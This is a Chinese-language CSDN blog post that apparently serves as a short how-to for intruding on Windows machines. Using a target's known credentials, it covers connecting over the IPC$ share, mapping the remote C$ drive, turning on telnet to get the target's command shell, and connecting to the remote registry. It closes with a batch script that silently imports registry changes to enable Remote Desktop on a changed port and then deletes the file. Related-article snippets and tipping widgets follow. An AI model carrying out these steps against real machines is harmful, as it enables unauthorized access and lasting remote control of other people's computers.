windows IPC$ telnet 注册表 入侵

最新推荐文章于 2024-06-12 00:15:00 发布
最新推荐文章于 2024-06-12 00:15:00 发布
阅读量922 收藏 3
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mmyzlinyingjie/article/details/21468321
版权

一. IPC$入侵

 条件:能ping通对方的主机, 有对方的一个用户而且这个用户必须有密码

     

     连接:net  use  \\192.168.0.2

            按提示输入对方的用户名和密码

     

     映射盘符:net  use  z:  \\192.168.0.2\c$

将对方的C盘映射为自己电脑的Z

 

  命令图:

 

结果:

 

 

二.Telnet入侵

IPC$入侵的基础上,也就是建立了IPC$入侵后,执行以下操作

 

1)首先要让对方的电脑开启telnet服务

步骤1:计算机-----管理-----操作-----连接远程计算机

 

步骤2:找到service,开启telnet服务

 

 

2) 这时可以断开IPC$服务了

    命令 : net  use  * /del

 

3)更改 cmd的属性,使其用管理员运行

步骤:开始----所有程序---附件---命令行----右键属性

 

4)   连接telnet

命令: telnet  192.168.0.2

然后按提示输入对方的用户名密码登陆就可以得到对方的cmd

 

三.注册表入侵

同样实在ipc$连接的基础上,打开注册表,文件----连接远程注册表---输入对方的电脑名称或用户名---检查名称

 

 

还没试过:不细说了

 

 

附:命令行开启远程桌面(保存为bat运行即可

echo Windows Registry Editor Version 5.00>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg

echo "fDenyTSConnections"=dword:00000000>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg

echo "PortNumber"=dword:00000d3d>>3389.reg

regedit /s 3389.reg 

del 3389.reg

mmyzlinyingjie
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WindowsIPC$服务及利用
2ed
11-13 4378
IPC$(Internet Process Connection) 共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。 在WindowsXP windows7等系统中,隐藏着一种据说是可以“致命”的漏洞,它让很多人一听到就谈“虎”色变。在“我的电脑”上右击“管理”,依次...
IPC$和Tenet 网络安全
12-17
### IPC$与Telnet入侵及防御措施 #### 实验背景及意义 随着互联网技术的不断发展,网络安全成为企业和个人用户越来越关注的问题。其中,IPC$和Telnet这两种远程访问技术经常被不法分子利用进行非法入侵活动。理解...
windowsIPC$telnet 注册表入侵
10-12
windowsIPC$telnet 注册表入侵
ipc$开启telnet
weixin_30445169的博客
03-28 130
@echo offtitle opentelnet cheng...MODE con: COLS=44 LINES=15:zjmclscolor 0afor /l %%i in (1,1,5) do echo.echo -简介- echo.echo 依靠ipc$来开启Telnet!echo 请按提示输入.....
修改注册表默认端口号;telnet端口号失败、不通、没反应;访问另一机器端口不通
最新发布
君琴 的博客
06-12 432
背景:在多集群项目中,发现访问其他机器不通。遂使用telnet命令试试,确实端口不通。也查看了防火墙策略等,最后尝试了修改注册表默认端口号。这样端口可通了。但并未实际解决问题,在实际项目中需要确认一下你实际项目中端口、是否建联成功、是否有数据等。
注册表来防黑入侵
06-04 449
在网络给我们的工作学习带来极大方便的同时,病毒、木马、后门以及黑客程序也严重影响着信息的安全。这些程序感染计算机的一个共同特点是在注册表中写入信息,来达到如自动运行、破坏和传播等目的。以下是笔者在网上收集的,通过修改注册表来对付病毒、木马、后门以及黑客程序,保证个人计算机的安全。   1.清理访问“网络邻居”后留下的字句信息   在HEKY_CURRENT_USERNetworkRecent下
web-iou telnet 注册表文件 for win7(32/64bit)
04-13
有需要的赶紧收藏。 稀缺资源不好找~ 注册表文件针对win7 32bit/64bit
一份详尽的IPC$入侵资料
01-06
1. **远程访问能力:** IPC$主要用于Windows NT系统中的远程管理,类似于Unix系统的Telnet服务。 2. **权限控制:** 通过IPC$可以获取目标系统的某些管理员权限,但并不是所有版本的Windows系统都支持IPC$功能,如...
批处理大观 IPC$入侵bat telnetbat 开机后台运行 等
06-14
在这个压缩包文件中,我们看到了与批处理相关的几个重要概念:IPC$入侵telnetbat以及开机后台运行。 首先,让我们详细了解一下IPC$入侵IPC$(Inter-Process Communication)是Windows系统中的一个共享通信机制...
ipc$的连接的一些东西
12-06
- **注册表编辑器设置**:可以通过修改注册表来禁用IPC$共享。 - 打开注册表编辑器,路径为 `[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]`,将 `RestrictAnonymous` 的值设为 `1` 来限制匿名访问。...
Windows系统IPC$共享与勒索病毒
abraham76的博客
03-31 7219
  不同的进程各自有着不同的地址空间,每个进程的全局变量对其它进程是透明的。因此进程间要进行数据交互就要通过内核,在内核中开辟一块缓冲区,每个进程只需把要共享的数据拷贝到缓冲区即可,内核提供的这种机制称为进程间通信(IPC) 共享命名管道   关于进程间通信(InterProcess Communication),管道和共享内存为大家所熟知,包括匿名管道和命名管道。Windows系统的IPC$其实就命名管道的一种应用,考虑到它用于不同设备间通信,所以可以翻译为Internet Process Connect
ipc$连接的脚本(windows)
11-21
ipc$连接虽然有些过时了,但是也可以看一下,我是菜鸡,大神勿喷。
2.4 针对注册表的攻防
qq_55202378的博客
07-14 1218
注册表
IPC$入侵综述
Yuan Lei 's Blog
01-24 2451
IPC$入侵综述 什么是ipcIPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)
注入(1)--注册表注入
weixin_34409741的博客
10-02 158
Windows NT/2000/XP/3000操作系统中,当需要加载user32.dll的程序启动时,user32.dll会加载注册表键HKEY_LOCAL_MACHINE\Software\Microsoft\windowsNT\CurrentVresion\Windows\AppInit_Dlls下边列出的所有模块,所以,可以将外挂模块写在AppInit_Dlls键下,待程序启动后,再将痕...
远程登录
TIAN316947127的专栏
07-16 1691
详情请参考:http://www.hzol.com.cn/bbs/dispbbs.asp?boardid=137&id=27352 win2003 远程登录 解析WIN2003之远程桌面连接   “远程桌面连接”是为Windows Server 2003系统提供的一种连接远程工作站的远程管理工具,在Windows XP系统中也可使用。安装了终端服务器的Windows 2000 Server计
telnet入侵
飞凌雪的专栏
03-22 9053
1.什么是Telnet 对于Telnet的认识,不同的人持有不同的观点,可以把Telnet当成一种通信 协议 ,但是对于 入侵 者而言,Telnet只是一种远程登录的 工具 。一旦 入侵 者与远程主机建立了Telnet连接, 入侵 者便可以使用目标主机上的软、硬件资源,而 入侵 者的本地机只相当于一个只有键盘和显示器的终端而已。 2.Telnet入侵 者用来做什么 (1)Telnet是控制主机
禁用危险的远程注册表 防止黑客远程控制自己机器
编程爱好者
03-15 1014
各位使用Windows 2000的用户,当你在编辑注册表时,可曾留意注册表编辑器菜单中的“注册表→连接网络注册表”一项?微软此举的目的,主要是为了方便网络管理员对网络中的计算机进行管理,但如果被别有用心的用户对自己的计算机的注册表进行远程操作,那就非常危险了。而且在Windows 2000系统中,是默认允许远程注册表操作的,那么,如何禁用它呢?  点击“开始→设置→控制面板→管理工具→服务”,
防范IPC$远程入侵常用方法
06-08
IPC$是Windows系统中的一个共享资源,它允许用户在网络上访问远程计算机的资源。然而,攻击者也可以利用IPC$来进行远程入侵,进而获取目标计算机的控制权。以下是一些防范IPC$远程入侵的常用方法: 1. 禁用IPC$共享...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

mmyzlinyingjie

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值